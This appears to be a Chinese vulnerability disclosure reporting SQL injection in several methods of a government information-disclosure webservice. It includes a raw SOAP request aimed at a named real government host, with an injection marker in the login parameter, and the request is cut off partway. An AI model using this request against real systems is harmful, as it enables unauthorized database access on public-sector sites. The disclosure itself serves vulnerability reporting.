大汉政府信息公开多处SQL注入一(附100个案例)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 大汉政府信息公开多处SQL注入一(附100个案例) ### 详细说明: webservice漏洞,漏洞存在于 /xxgk/services/WSSync_searchinfo 该WSSync_searchinfo服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在,如 getClientIpAxis wsTest wsSyncGetInfos setBase64 isBase64 setStrAppId 上述方法的多个参数均存在漏洞,这里随便选取一个方法进行测试 首先保存如下内容为wooyun.txt ``` POST /xxgk/services/WSSync_searchinfo HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.cqyc.gov.cn Connection: Close User-Agent: google robots <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.blf.jcms"> <soapenv:Header/> <soapenv:Body> <web:wsSyncGetInfos soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <strLoginId xsi:type="xsd:string">1*</strLoginId> <strPwd xsi:type="xsd:string">1</strPwd> <strKey xsi:type="xsd:string">1</strKey> <num xsi:type="xsd:string">1</num> <maxId...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息